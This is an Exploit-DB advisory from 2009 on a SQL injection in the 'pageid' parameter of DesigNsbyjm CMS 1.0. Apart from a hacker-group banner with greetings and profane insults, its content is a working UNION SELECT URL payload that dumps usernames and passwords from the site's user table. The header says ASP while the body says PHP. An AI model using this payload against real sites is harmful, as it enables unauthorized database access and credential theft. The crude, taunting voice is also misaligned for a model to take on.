DesigNsbyjm CMS 1.0 - 'PageId' SQL Injection

EDB-ID:

10455

CVE:

N/A


Platform:

ASP

Published:

2009-12-15

===========================================================================
===
[»] ~ Note : Hacker R0x Lamerz Sux !
===========================================================================
===
[»] DesigNsbyjm Cms <== 1.0 (PageId) Remote SQL Injection
Vulnerability
===========================================================================
===
[»] my home: [ Hackteach.org ]
[»] Script: [ DesigNsbyjm Cms 1.0 ]
[»] Language: [ PHP ]
[»] Home: [ http://designsbyjm.net/ ]
[»] Founder: [ Red-D3v1L < No Email :d < ]
[»] Gr44tz to: [ Hackteach Team - H1s0k4 - SkuLL-HaCkEr
- sec-r1z.com - 0d4y.com ]
[»] Fuck to : [ Gaza 5acker << Big Big Big Lamerz ]
########################################################################

===[ Exploit SQL ]=== 

[»] [Path]/viewcontent.asp?pageid=[SQL]

http://server/viewcontent.asp?pageid=-9+union+select+1,2,3,4,
password,6,username,8,9,10,11,12,13+from+user


Author: Red-D3v1L